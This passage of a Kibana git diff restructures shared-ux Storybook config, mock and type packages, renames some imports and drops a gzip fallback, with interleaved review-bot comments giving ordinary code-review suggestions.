@@ -0,0 +1,74 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import { AbstractStorybookMock } from '@kbn/shared-ux-storybook-mock'; +import type { ArgumentParams } from '@kbn/shared-ux-storybook-mock'; + +import type { + NoDataConfig, + NoDataConfigPageProps, + NoDataConfigPageServices, +} from '@kbn/shared-ux-page-no-data-config-types'; +import { NoDataPageStorybookMock } from '@kbn/shared-ux-page-no-data-mocks'; +import type { NoDataPageStorybookParams } from '@kbn/shared-ux-page-no-data-mocks'; + +type PropArguments = Pick; + +export type Params = ArgumentParams & NoDataPageStorybookParams; + +const dataPageMock = new NoDataPageStorybookMock(); + +export class NoDataConfigPageStorybookMock extends AbstractStorybookMock< + NoDataConfigPageProps, + NoDataConfigPageServices, + PropArguments +> { + propArguments = { + solution: { + control: 'text', + defaultValue: 'Observability', + }, + logo: { + control: { type: 'radio' }, + options: ['logoElastic', 'logoKibana', 'logoCloud', undefined], + defaultValue: undefined, + }, + docsLink: { + control: 'text', + defaultValue: 'docs/link', + }, + pageTitle: { + control: 'text', + defaultValue: '', + }, + }; + + serviceArguments = {}; + + dependencies = [dataPageMock]; + + getProps(params?: Params): NoDataConfigPageProps { + return { + noDataConfig: { + action: { + elasticAgent: { + title: 'Add Integrations', + }, + }, + solution: this.getArgumentValue('solution', params), + logo: this.getArgumentValue('logo', params), + docsLink: this.getArgumentValue('docsLink', params), + pageTitle: this.getArgumentValue('pageTitle', params), + }, + }; + } + + getServices(params: Params): NoDataConfigPageServices { + return 
{ ...dataPageMock.getServices(params) }; + } +} diff --git a/packages/shared-ux/page/no_data_config/mocks/tsconfig.json b/packages/shared-ux/page/no_data_config/mocks/tsconfig.json new file mode 100644 index 0000000000000..dc96ec41f9035 --- /dev/null +++ b/packages/shared-ux/page/no_data_config/mocks/tsconfig.json @@ -0,0 +1,20 @@ +{ + "extends": "../../../../../tsconfig.bazel.json", + "compilerOptions": { + "declaration": true, + "declarationMap": true, + "emitDeclarationOnly": true, + "outDir": "target_types", + "rootDir": "src", + "stripInternal": false, + "types": [ + "jest", + "node", + "react" + ] + }, + "include": [ + "**/*.ts", + "**/*.tsx", + ] +} diff --git a/packages/shared-ux/page/no_data_config/types/BUILD.bazel b/packages/shared-ux/page/no_data_config/types/BUILD.bazel new file mode 100644 index 0000000000000..6fa1669fcc176 --- /dev/null +++ b/packages/shared-ux/page/no_data_config/types/BUILD.bazel 
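Review bot: `getProps(params?: Params)` takes an optional parameter while `getServices(params: Params)` requires one, so a caller that relies on the argument defaults for props still has to pass an object for services. Making both `params?: Params` keeps the class consistent; whether `dataPageMock.getServices(params)` then accepts `undefined` depends on the no-data mock's signature, which is outside this diff, so confirm before changing it. Separately, `type PropArguments = Pick;` and `export type Params = ArgumentParams & NoDataPageStorybookParams;` appear here without type arguments; a bare `Pick` does not compile, so this looks like rendering loss — verify the committed file carries `Pick<NoDataConfig, ...>` and `ArgumentParams<PropArguments>`.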
@@ -0,0 +1,59 @@ +load("@npm//@bazel/typescript:index.bzl", "ts_config") +load("@build_bazel_rules_nodejs//:index.bzl", "js_library") +load("//src/dev/bazel:index.bzl", "jsts_transpiler", "pkg_npm", "pkg_npm_types", "ts_project") + +PKG_DIRNAME = "types" +PKG_REQUIRE_NAME = "@kbn/shared-ux-page-no-data-config-types" + +SRCS = glob( + [ + "*.d.ts", + ] +) + +filegroup( + name = "srcs", + srcs = SRCS, +) + +NPM_MODULE_EXTRA_FILES = [ + "package.json", +] + +# In this array place runtime dependencies, including other packages and NPM packages +# which must be available for this code to run. +# +# To reference other packages use: +# "//repo/relative/path/to/package" +# eg. "//packages/kbn-utils" +# +# To reference a NPM package use: +# "@npm//name-of-package" +# eg. "@npm//lodash" +RUNTIME_DEPS = [ +] + +js_library( + name = PKG_DIRNAME, + srcs = SRCS + NPM_MODULE_EXTRA_FILES, + deps = RUNTIME_DEPS, + package_name = PKG_REQUIRE_NAME, + visibility = ["//visibility:public"], +) + +pkg_npm( + name = "npm_module", + deps = [":" + PKG_DIRNAME], +) + +filegroup( + name = "build", + srcs = [":npm_module"], + visibility = ["//visibility:public"], +) + +alias( + name = "npm_module_types", + actual = ":" + PKG_DIRNAME, + visibility = ["//visibility:public"], +) diff --git a/packages/shared-ux/page/no_data_config/types/README.md b/packages/shared-ux/page/no_data_config/types/README.md new file mode 100644 index 0000000000000..dd146f60dcf4b --- /dev/null +++ b/packages/shared-ux/page/no_data_config/types/README.md @@ -0,0 +1,3 @@ +# @kbn/shared-ux-page-no-data-config-types + +Empty package generated by @kbn/generate diff --git a/packages/shared-ux/page/no_data_config/types/index.d.ts b/packages/shared-ux/page/no_data_config/types/index.d.ts new file mode 100644 index 0000000000000..10950bcf296c8 --- /dev/null +++ b/packages/shared-ux/page/no_data_config/types/index.d.ts 
@@ -0,0 +1,27 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import { EuiPageTemplateProps } from '@elastic/eui'; + +import type { + NoDataPageProps, + NoDataPageServices, + NoDataPageKibanaDependencies, +} from '@kbn/shared-ux-page-no-data-types'; + +export type NoDataConfigPageKibanaDependencies = NoDataPageKibanaDependencies; +export type NoDataConfigPageServices = NoDataPageServices; +export type NoDataConfig = NoDataPageProps; + +export type NoDataConfigPageProps = EuiPageTemplateProps & { + /** + * Accepts a configuration object, that when provided, ignores pageHeader and children and instead + * displays Agent, Beats, and custom cards to direct users to the right ingest location + */ + noDataConfig?: NoDataConfig; +}; diff --git a/packages/shared-ux/page/no_data_config/types/package.json b/packages/shared-ux/page/no_data_config/types/package.json new file mode 100644 index 0000000000000..1af47fb4c5028 --- /dev/null +++ b/packages/shared-ux/page/no_data_config/types/package.json @@ -0,0 +1,7 @@ +{ + "name": "@kbn/shared-ux-page-no-data-config-types", + "private": true, + "version": "1.0.0", + "main": "./target_node/index.js", + "license": "SSPL-1.0 OR Elastic License 2.0" +} diff --git a/packages/shared-ux/page/no_data_config/types/tsconfig.json b/packages/shared-ux/page/no_data_config/types/tsconfig.json new file mode 100644 index 0000000000000..7a4adfcdbecff --- /dev/null +++ b/packages/shared-ux/page/no_data_config/types/tsconfig.json 
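Review bot: `import { EuiPageTemplateProps } from '@elastic/eui';` is a value-style import of a type-only symbol, inconsistent with the `import type` used for the `@kbn/shared-ux-page-no-data-types` import just below it; change it to `import type { EuiPageTemplateProps } from '@elastic/eui';`. The three aliases `NoDataConfigPageKibanaDependencies`, `NoDataConfigPageServices` and `NoDataConfig` would also benefit from a one-line TSDoc each stating that they are currently plain re-exports of the no-data page types, so that any later divergence is visibly deliberate.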
@@ -0,0 +1,14 @@ +{ + "extends": "../../../../../tsconfig.bazel.json", + "compilerOptions": { + "declaration": true, + "declarationMap": true, + "emitDeclarationOnly": true, + "outDir": "target_types", + "stripInternal": false, + "types": [] + }, + "include": [ + "*.d.ts" + ] +} diff --git a/packages/shared-ux/page/solution_nav/src/solution_nav.stories.tsx b/packages/shared-ux/page/solution_nav/src/solution_nav.stories.tsx index 9613fbac42f6e..2f22aad173771 100644 --- a/packages/shared-ux/page/solution_nav/src/solution_nav.stories.tsx +++ b/packages/shared-ux/page/solution_nav/src/solution_nav.stories.tsx @@ -11,7 +11,7 @@ import { action } from '@storybook/addon-actions'; import { SolutionNav as Component, SolutionNavProps } from './solution_nav'; export default { - title: 'Page Template', + title: 'Page/Solution Nav', description: 'Solution-specific navigation for the sidebar', }; diff --git a/packages/shared-ux/prompt/no_data_views/impl/src/index.ts b/packages/shared-ux/prompt/no_data_views/impl/src/index.ts index 9483e5406da4c..48afcb7936997 100644 --- a/packages/shared-ux/prompt/no_data_views/impl/src/index.ts +++ b/packages/shared-ux/prompt/no_data_views/impl/src/index.ts @@ -8,7 +8,7 @@ export type { NoDataViewsPromptComponentProps, - NoDataViewsPromptKibanaServices, + NoDataViewsPromptKibanaDependencies, NoDataViewsPromptProps, NoDataViewsPromptServices, } from '@kbn/shared-ux-prompt-no-data-views-types'; diff --git a/packages/shared-ux/prompt/no_data_views/impl/src/no_data_views.stories.tsx b/packages/shared-ux/prompt/no_data_views/impl/src/no_data_views.stories.tsx index 56d4ec63d2eaa..748687fbda5e8 100644 --- a/packages/shared-ux/prompt/no_data_views/impl/src/no_data_views.stories.tsx +++ b/packages/shared-ux/prompt/no_data_views/impl/src/no_data_views.stories.tsx 
@@ -29,7 +29,7 @@ export default { const mock = new NoDataViewsPromptStorybookMock(); -export const NoDataViews = (params: NoDataViewsPromptStorybookParams) => { +export const Prompt = (params: NoDataViewsPromptStorybookParams) => { return ( @@ -37,4 +37,4 @@ export const NoDataViews = (params: NoDataViewsPromptStorybookParams) => { ); }; -NoDataViews.argTypes = mock.getArgumentTypes(); +Prompt.argTypes = mock.getArgumentTypes(); diff --git a/packages/shared-ux/prompt/no_data_views/impl/src/services.tsx b/packages/shared-ux/prompt/no_data_views/impl/src/services.tsx index cf6236429441f..b8fe90e1ef135 100644 --- a/packages/shared-ux/prompt/no_data_views/impl/src/services.tsx +++ b/packages/shared-ux/prompt/no_data_views/impl/src/services.tsx @@ -9,7 +9,7 @@ import React, { FC, useContext } from 'react'; import type { NoDataViewsPromptServices, - NoDataViewsPromptKibanaServices, + NoDataViewsPromptKibanaDependencies, } from '@kbn/shared-ux-prompt-no-data-views-types'; const NoDataViewsPromptContext = React.createContext(null); @@ -37,7 +37,7 @@ export const NoDataViewsPromptProvider: FC = ({ /** * Kibana-specific Provider that maps to known dependency types. */ -export const NoDataViewsPromptKibanaProvider: FC = ({ +export const NoDataViewsPromptKibanaProvider: FC = ({ children, ...services }) => { diff --git a/packages/shared-ux/prompt/no_data_views/mocks/BUILD.bazel b/packages/shared-ux/prompt/no_data_views/mocks/BUILD.bazel index 21099840dc91e..6f725e99b6147 100644 --- a/packages/shared-ux/prompt/no_data_views/mocks/BUILD.bazel +++ b/packages/shared-ux/prompt/no_data_views/mocks/BUILD.bazel @@ -10,8 +10,17 @@ SOURCE_FILES = glob( "src/**/*.ts", ], exclude = [ + "**/*.config.js", + "**/*.mock.*", "**/*.test.*", "**/*.stories.*", + "**/__snapshots__", + "**/integration_tests", + "**/mocks", + "**/scripts", + "**/storybook", + "**/test_fixtures", + "**/test_helpers", ], ) 
@@ -38,6 +47,7 @@ NPM_MODULE_EXTRA_FILES = [ # eg. "@npm//lodash" RUNTIME_DEPS = [ "@npm//@storybook/addon-actions", + "@npm//react", "//packages/shared-ux/storybook/mock", ] @@ -51,9 +61,10 @@ RUNTIME_DEPS = [ # # References to NPM packages work the same as RUNTIME_DEPS TYPES_DEPS = [ - "@npm//@types/node", - "@npm//@types/jest", "@npm//@storybook/addon-actions", + "@npm//@types/jest", + "@npm//@types/node", + "@npm//@types/react", "//packages/shared-ux/prompt/no_data_views/types:npm_module_types", "//packages/shared-ux/storybook/mock:npm_module_types", ] @@ -65,6 +76,14 @@ jsts_transpiler( root_input_dir = "src", ) +jsts_transpiler( + name = "target_web", + srcs = SRCS, + build_pkg_name = package_name(), + root_input_dir = "src", + web = True, +) + ts_config( name = "tsconfig", src = "tsconfig.json", @@ -90,7 +109,7 @@ ts_project( js_library( name = PKG_DIRNAME, srcs = NPM_MODULE_EXTRA_FILES, - deps = RUNTIME_DEPS + [":target_node"], + deps = RUNTIME_DEPS + [":target_node", ":target_web"], package_name = PKG_REQUIRE_NAME, visibility = ["//visibility:public"], ) diff --git a/packages/shared-ux/prompt/no_data_views/mocks/jest.config.js b/packages/shared-ux/prompt/no_data_views/mocks/jest.config.js deleted file mode 100644 index 1efd78b09a8b1..0000000000000 --- a/packages/shared-ux/prompt/no_data_views/mocks/jest.config.js +++ /dev/null @@ -1,13 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -module.exports = { - preset: '@kbn/test/jest_node', - rootDir: '../../../../..', - roots: ['/packages/shared-ux/prompt/no_data_views/mocks'], -}; 
diff --git a/packages/shared-ux/prompt/no_data_views/mocks/package.json b/packages/shared-ux/prompt/no_data_views/mocks/package.json index b00c829ace8e5..2478bd3e76dd4 100644 --- a/packages/shared-ux/prompt/no_data_views/mocks/package.json +++ b/packages/shared-ux/prompt/no_data_views/mocks/package.json @@ -3,5 +3,6 @@ "private": true, "version": "1.0.0", "main": "./target_node/index.js", + "browser": "./target_web/index.js", "license": "SSPL-1.0 OR Elastic License 2.0" } \ No newline at end of file diff --git a/packages/shared-ux/prompt/no_data_views/mocks/tsconfig.json b/packages/shared-ux/prompt/no_data_views/mocks/tsconfig.json index 894f01d3220e9..dc96ec41f9035 100644 --- a/packages/shared-ux/prompt/no_data_views/mocks/tsconfig.json +++ b/packages/shared-ux/prompt/no_data_views/mocks/tsconfig.json @@ -9,10 +9,12 @@ "stripInternal": false, "types": [ "jest", - "node" + "node", + "react" ] }, "include": [ - "src/**/*" + "**/*.ts", + "**/*.tsx", ] } diff --git a/packages/shared-ux/prompt/no_data_views/types/index.d.ts b/packages/shared-ux/prompt/no_data_views/types/index.d.ts index e143e4e6d035c..4b428cc64ad3d 100644 --- a/packages/shared-ux/prompt/no_data_views/types/index.d.ts +++ b/packages/shared-ux/prompt/no_data_views/types/index.d.ts @@ -42,7 +42,7 @@ export interface NoDataViewsPromptServices { /** * Kibana-specific service types. */ -export interface NoDataViewsPromptKibanaServices { +export interface NoDataViewsPromptKibanaDependencies { coreStart: { docLinks: { links: { diff --git a/packages/kbn-shared-ux-storybook/BUILD.bazel b/packages/shared-ux/storybook/config/BUILD.bazel similarity index 88% rename from packages/kbn-shared-ux-storybook/BUILD.bazel rename to packages/shared-ux/storybook/config/BUILD.bazel index 4f710f2dbe120..1f35734bb2147 100644 --- a/packages/kbn-shared-ux-storybook/BUILD.bazel +++ b/packages/shared-ux/storybook/config/BUILD.bazel 
@@ -2,16 +2,25 @@ load("@npm//@bazel/typescript:index.bzl", "ts_config") load("@build_bazel_rules_nodejs//:index.bzl", "js_library") load("//src/dev/bazel:index.bzl", "jsts_transpiler", "pkg_npm", "pkg_npm_types", "ts_project") -PKG_DIRNAME = "kbn-shared-ux-storybook" -PKG_REQUIRE_NAME = "@kbn/shared-ux-storybook" +PKG_DIRNAME = "config" +PKG_REQUIRE_NAME = "@kbn/shared-ux-storybook-config" SOURCE_FILES = glob( [ - "src/**/*.ts", - "src/**/*.tsx", + "**/*.ts", ], exclude = [ + "**/*.config.js", + "**/*.mock.*", "**/*.test.*", + "**/*.stories.*", + "**/__snapshots__", + "**/integration_tests", + "**/mocks", + "**/scripts", + "**/storybook", + "**/test_fixtures", + "**/test_helpers", ], ) @@ -37,10 +46,10 @@ NPM_MODULE_EXTRA_FILES = [ # "@npm//name-of-package" # eg. "@npm//lodash" RUNTIME_DEPS = [ - "//packages/kbn-shared-ux-services", "//packages/kbn-storybook", "@npm//@storybook/react", "@npm//@storybook/addon-actions", + "@npm//jest-mock", ] # In this array place dependencies necessary to build the types, which will include the @@ -53,7 +62,7 @@ RUNTIME_DEPS = [ # # References to NPM packages work the same as RUNTIME_DEPS TYPES_DEPS = [ - "//packages/kbn-shared-ux-services:npm_module_types", + "@npm//jest-mock", "//packages/kbn-storybook:npm_module_types", "//packages/kbn-ambient-ui-types:npm_module_types", "//packages/kbn-ambient-storybook-types:npm_module_types", @@ -67,14 +76,12 @@ jsts_transpiler( name = "target_node", srcs = SRCS, build_pkg_name = package_name(), - root_input_dir = "src", ) jsts_transpiler( name = "target_web", srcs = SRCS, build_pkg_name = package_name(), - root_input_dir = "src", web = True, ) @@ -96,7 +103,7 @@ ts_project( declaration_map = True, emit_declaration_only = True, out_dir = "target_types", - root_dir = "src", + root_dir = ".", tsconfig = ":tsconfig", ) diff --git a/packages/shared-ux/storybook/config/README.mdx b/packages/shared-ux/storybook/config/README.mdx new file mode 100644 index 0000000000000..eeab8f1f4c987 --- /dev/null 
+++ b/packages/shared-ux/storybook/config/README.mdx @@ -0,0 +1,3 @@ +# @kbn/shared-ux-storybook-config + +Storybook configuration used by `yarn storybook`. Refer to `@kbn/storybook` for more information. diff --git a/packages/kbn-shared-ux-components/src/page_template/util/presentation.ts b/packages/shared-ux/storybook/config/constants.ts similarity index 58% rename from packages/kbn-shared-ux-components/src/page_template/util/presentation.ts rename to packages/shared-ux/storybook/config/constants.ts index ab7144ee37b57..8efe045ad57a1 100644 --- a/packages/kbn-shared-ux-components/src/page_template/util/presentation.ts +++ b/packages/shared-ux/storybook/config/constants.ts @@ -6,8 +6,8 @@ * Side Public License, v 1. */ -import classNames from 'classnames'; +/** The title of the Storybook. */ +export const TITLE = 'Shared UX Storybook'; -export const getClasses = (template: string | undefined, className: string | undefined) => { - return classNames('kbnPageTemplate', { [`kbnPageTemplate--${template}`]: template }, className); -}; +/** The remote URL of the root from which Storybook loads stories for Shared UX. */ +export const URL = 'https://github.com/elastic/kibana/tree/main/packages/shared_ux'; diff --git a/packages/kbn-shared-ux-components/src/page_template/util/index.ts b/packages/shared-ux/storybook/config/index.ts similarity index 82% rename from packages/kbn-shared-ux-components/src/page_template/util/index.ts rename to packages/shared-ux/storybook/config/index.ts index adfefdf834566..5a73da614bf27 100644 --- a/packages/kbn-shared-ux-components/src/page_template/util/index.ts +++ b/packages/shared-ux/storybook/config/index.ts @@ -6,5 +6,4 @@ * Side Public License, v 1. */ -export { getClasses } from './presentation'; -export * from './constants'; +export { TITLE, URL } from './constants'; 
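Review bot: In constants.ts, `URL` points at `packages/shared_ux`, while every path in this commit lives under `packages/shared-ux` (hyphen), so the Storybook brand link probably resolves to a non-existent tree; confirm the intended location and adjust the string. Naming the export `URL` also shadows the global `URL` constructor in any module that imports it unaliased — manager.ts already has to alias it to `brandUrl` — so `STORYBOOK_URL` and `STORYBOOK_TITLE` would be safer names, with the `/** ... */` comments kept as they are.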
diff --git a/packages/kbn-shared-ux-storybook/src/config/main.ts b/packages/shared-ux/storybook/config/main.ts similarity index 72% rename from packages/kbn-shared-ux-storybook/src/config/main.ts rename to packages/shared-ux/storybook/config/main.ts index 6e57ca8ad5e72..47a47a5a802b3 100644 --- a/packages/kbn-shared-ux-storybook/src/config/main.ts +++ b/packages/shared-ux/storybook/config/main.ts @@ -10,11 +10,7 @@ import { defaultConfig } from '@kbn/storybook'; module.exports = { ...defaultConfig, - stories: [ - '../../../shared-ux/**/*.stories.+(tsx|mdx)', - '../../../kbn-shared-ux*/**/*.stories.+(tsx|mdx)', - '../../../../src/plugins/shared_ux/**/*.stories.+(tsx|mdx)', - ], + stories: ['../../**/*.stories.+(tsx|mdx)'], reactOptions: { strictMode: true, }, diff --git a/packages/kbn-shared-ux-storybook/src/config/manager.ts b/packages/shared-ux/storybook/config/manager.ts similarity index 72% rename from packages/kbn-shared-ux-storybook/src/config/manager.ts rename to packages/shared-ux/storybook/config/manager.ts index 64284fb46f36f..fb973258b9053 100644 --- a/packages/kbn-shared-ux-storybook/src/config/manager.ts +++ b/packages/shared-ux/storybook/config/manager.ts @@ -8,14 +8,16 @@ import { addons } from '@storybook/addons'; import { create } from '@storybook/theming'; -import { PANEL_ID } from '@storybook/addon-actions'; +import { PANEL_ID as selectedPanel } from '@storybook/addon-actions'; + +import { TITLE as brandTitle, URL as brandUrl } from './constants'; addons.setConfig({ theme: create({ base: 'light', - brandTitle: 'Shared UX Storybook', - brandUrl: 'https://github.com/elastic/kibana/tree/main/src/plugins/shared_ux', + brandTitle, + brandUrl, }), + selectedPanel, showPanel: true.valueOf, - selectedPanel: PANEL_ID, }); 
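Review bot: In manager.ts, `showPanel: true.valueOf,` (a context line this hunk keeps) passes the `Boolean.prototype.valueOf` function rather than the boolean `true`; it only works because a function object is truthy. While the `addons.setConfig` object is being rewritten it should read `showPanel: true,`. Aliasing `PANEL_ID` to `selectedPanel` purely to use shorthand property syntax is harmless, but `selectedPanel: PANEL_ID,` said more clearly where the value comes from.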
diff --git a/packages/kbn-shared-ux-storybook/package.json b/packages/shared-ux/storybook/config/package.json similarity index 78% rename from packages/kbn-shared-ux-storybook/package.json rename to packages/shared-ux/storybook/config/package.json index c5f22bb151431..ee7206b2d87df 100644 --- a/packages/kbn-shared-ux-storybook/package.json +++ b/packages/shared-ux/storybook/config/package.json @@ -1,8 +1,8 @@ { - "name": "@kbn/shared-ux-storybook", + "name": "@kbn/shared-ux-storybook-config", "private": true, "version": "1.0.0", "main": "./target_node/index.js", "browser": "./target_web/index.js", "license": "SSPL-1.0 OR Elastic License 2.0" -} +} \ No newline at end of file diff --git a/packages/shared-ux/storybook/config/preview.ts b/packages/shared-ux/storybook/config/preview.ts new file mode 100644 index 0000000000000..5a53e48a916d8 --- /dev/null +++ b/packages/shared-ux/storybook/config/preview.ts @@ -0,0 +1,21 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +/* eslint-disable @typescript-eslint/no-namespace,@typescript-eslint/no-empty-interface */ +declare global { + namespace NodeJS { + interface Global {} + interface InspectOptions {} + type ConsoleConstructor = console.ConsoleConstructor; + } +} +/* eslint-enable */ + +import jest from 'jest-mock'; +/* @ts-expect-error TS doesn't see jest as a property of window, and I don't want to edit our global config. */ +window.jest = jest; 
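Review bot: In preview.ts, the `declare global { namespace NodeJS { ... } }` block and the `window.jest = jest;` assignment have no explanation, and neither is obvious: the former redeclares `NodeJS.Global`, `InspectOptions` and `ConsoleConstructor`, presumably so that `jest-mock`'s typings load under a browser `lib` setting, and the latter exposes `jest-mock` to stories at runtime. A short header such as `// jest-mock's typings reference NodeJS globals missing from the browser lib; stub them so the import type-checks, then expose jest-mock on window for stories that call jest.fn().` would spare the next reader the archaeology — adjust the wording if the real reason differs.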
diff --git a/packages/kbn-shared-ux-storybook/tsconfig.json b/packages/shared-ux/storybook/config/tsconfig.json similarity index 78% rename from packages/kbn-shared-ux-storybook/tsconfig.json rename to packages/shared-ux/storybook/config/tsconfig.json index b26c95a01dfd8..835b78a44758d 100644 --- a/packages/kbn-shared-ux-storybook/tsconfig.json +++ b/packages/shared-ux/storybook/config/tsconfig.json @@ -1,11 +1,11 @@ { - "extends": "../../tsconfig.bazel.json", + "extends": "../../../../tsconfig.bazel.json", "compilerOptions": { "declaration": true, "declarationMap": true, "emitDeclarationOnly": true, "outDir": "target_types", - "rootDir": "src", + "rootDir": ".", "stripInternal": false, "types": [ "jest", @@ -14,6 +14,6 @@ ] }, "include": [ - "src/**/*" + "*.ts" ] } diff --git a/packages/shared-ux/storybook/mock/BUILD.bazel b/packages/shared-ux/storybook/mock/BUILD.bazel index 71b1a263ea0af..c77d05261bc1d 100644 --- a/packages/shared-ux/storybook/mock/BUILD.bazel +++ b/packages/shared-ux/storybook/mock/BUILD.bazel @@ -10,8 +10,17 @@ SOURCE_FILES = glob( "src/**/*.ts", ], exclude = [ + "**/*.config.js", + "**/*.mock.*", "**/*.test.*", "**/*.stories.*", + "**/__snapshots__", + "**/integration_tests", + "**/mocks", + "**/scripts", + "**/storybook", + "**/test_fixtures", + "**/test_helpers", ], ) @@ -37,6 +46,8 @@ NPM_MODULE_EXTRA_FILES = [ # "@npm//name-of-package" # eg. "@npm//lodash" RUNTIME_DEPS = [ + "@npm//@storybook/react", + "@npm//react", ] # In this array place dependencies necessary to build the types, which will include the @@ -49,9 +60,10 @@ RUNTIME_DEPS = [ # # References to NPM packages work the same as RUNTIME_DEPS TYPES_DEPS = [ - "@npm//@types/node", - "@npm//@types/jest", "@npm//@storybook/react", + "@npm//@types/jest", + "@npm//@types/node", + "@npm//@types/react", ] jsts_transpiler( 
@@ -61,6 +73,14 @@ jsts_transpiler( root_input_dir = "src", ) +jsts_transpiler( + name = "target_web", + srcs = SRCS, + build_pkg_name = package_name(), + root_input_dir = "src", + web = True, +) + ts_config( name = "tsconfig", src = "tsconfig.json", @@ -86,7 +106,7 @@ ts_project( js_library( name = PKG_DIRNAME, srcs = NPM_MODULE_EXTRA_FILES, - deps = RUNTIME_DEPS + [":target_node"], + deps = RUNTIME_DEPS + [":target_node", ":target_web"], package_name = PKG_REQUIRE_NAME, visibility = ["//visibility:public"], ) diff --git a/packages/shared-ux/storybook/mock/package.json b/packages/shared-ux/storybook/mock/package.json index 18761aab4c92c..0baee9437cac0 100644 --- a/packages/shared-ux/storybook/mock/package.json +++ b/packages/shared-ux/storybook/mock/package.json @@ -3,5 +3,6 @@ "private": true, "version": "1.0.0", "main": "./target_node/index.js", + "browser": "./target_web/index.js", "license": "SSPL-1.0 OR Elastic License 2.0" } \ No newline at end of file diff --git a/packages/shared-ux/storybook/mock/tsconfig.json b/packages/shared-ux/storybook/mock/tsconfig.json index 39d3c7097814a..7b7386979c9a8 100644 --- a/packages/shared-ux/storybook/mock/tsconfig.json +++ b/packages/shared-ux/storybook/mock/tsconfig.json @@ -9,10 +9,12 @@ "stripInternal": false, "types": [ "jest", - "node" + "node", + "react" ] }, "include": [ - "src/**/*" + "**/*.ts", + "**/*.tsx", ] } diff --git a/scripts/synthtrace.js b/scripts/synthtrace.js index 5e551acf84769..bffa55065a17f 100644 --- a/scripts/synthtrace.js +++ b/scripts/synthtrace.js 
@@ -9,8 +9,8 @@ require('../src/setup_node_env'); // We have to import directly from package since scenarios and worker.js are imported dynamically, -// If we import the package (require('@elastic/apm-synthtrace')) the program will be executed on the compiled files, and thus we need to +// If we import the package (require('@kbn/apm-synthtrace')) the program will be executed on the compiled files, and thus we need to // compile scenarios with `yarn kbn bootstrap` every time scenario changes. // eslint-disable-next-line @kbn/imports/uniform_imports -require('../packages/elastic-apm-synthtrace/src/cli').runSynthtrace(); +require('../packages/kbn-apm-synthtrace/src/cli').runSynthtrace(); diff --git a/src/cli/command.js b/src/cli/command.js index 6174cab85dec3..b85037330027b 100644 --- a/src/cli/command.js +++ b/src/cli/command.js @@ -6,7 +6,7 @@ * Side Public License, v 1. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import _ from 'lodash'; import Chalk from 'chalk'; diff --git a/src/cli/keystore/read_keystore.js b/src/cli/keystore/read_keystore.js index d3629c32671f7..a4f007690a661 100644 --- a/src/cli/keystore/read_keystore.js +++ b/src/cli/keystore/read_keystore.js @@ -6,7 +6,7 @@ * Side Public License, v 1. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { Keystore } from '.'; import { getKeystore } from '../../cli_keystore/get_keystore'; diff --git a/src/cli/serve/serve.js b/src/cli/serve/serve.js index 6425b0d6c8005..d5c1f844c4d1c 100644 --- a/src/cli/serve/serve.js +++ b/src/cli/serve/serve.js @@ -6,7 +6,7 @@ * Side Public License, v 1. */ -import { set as lodashSet } from '@elastic/safer-lodash-set'; +import { set as lodashSet } from '@kbn/safer-lodash-set'; import _ from 'lodash'; import { statSync } from 'fs'; import { resolve } from 'path'; 
diff --git a/src/core/public/chrome/ui/header/collapsible_nav.tsx b/src/core/public/chrome/ui/header/collapsible_nav.tsx index abf4c5f0965eb..01064662ad304 100644 --- a/src/core/public/chrome/ui/header/collapsible_nav.tsx +++ b/src/core/public/chrome/ui/header/collapsible_nav.tsx @@ -93,6 +93,7 @@ const overviewIDs = [ 'observability-overview', 'securitySolutionUI:get_started', 'management', + 'enterpriseSearch', ]; export function CollapsibleNav({ diff --git a/src/core/server/core_app/bundle_routes/select_compressed_file.ts b/src/core/server/core_app/bundle_routes/select_compressed_file.ts index 36c63f653618c..339a99b635aaf 100644 --- a/src/core/server/core_app/bundle_routes/select_compressed_file.ts +++ b/src/core/server/core_app/bundle_routes/select_compressed_file.ts @@ -40,10 +40,6 @@ export async function selectCompressedFile(acceptEncodingHeader: string | undefi fileEncoding = 'br'; fd = await tryToOpenFile(`${path}.br`); } - if (!fd && supportedEncodings.includes('gzip')) { - fileEncoding = 'gzip'; - fd = await tryToOpenFile(`${path}.gz`); - } } if (!fd) { diff --git a/src/core/server/integration_tests/saved_objects/migrations/actions/actions.test.ts b/src/core/server/integration_tests/saved_objects/migrations/actions/actions.test.ts index c616138c31af5..a656b0bdd10e5 100644 --- a/src/core/server/integration_tests/saved_objects/migrations/actions/actions.test.ts +++ b/src/core/server/integration_tests/saved_objects/migrations/actions/actions.test.ts @@ -475,7 +475,7 @@ describe('migration actions', () => { source: 'existing_index_with_write_block', target: 'clone_target_1', }); - expect.assertions(1); + expect.assertions(3); await expect(task()).resolves.toMatchInlineSnapshot(` Object { "_tag": "Right", 
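Review bot: With the gzip branch removed from `selectCompressedFile`, the function now only ever tries `${path}.br`, so any client whose Accept-Encoding lacks `br` (older proxies and HTTP clients that advertise only gzip) falls through to the uncompressed file. That is a reasonable trade-off only if the build no longer emits `.gz` bundles and the plain-file fallback under `if (!fd)` is acceptable for those clients; a comment on the remaining branch, e.g. `// Pre-compressed .gz bundles are no longer produced; clients without br receive the uncompressed file.`, would record the decision. `selectCompressedFile` begins and ends outside the hunk, so the `fileEncoding` declaration and any gzip mention in its docs should be checked for leftovers too.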
@@ -485,6 +485,12 @@ describe('migration actions', () => {
 },
 }
 `);
+ const { clone_target_1: cloneTarget1 } = await client.indices.getSettings({
+ index: 'clone_target_1',
+ });
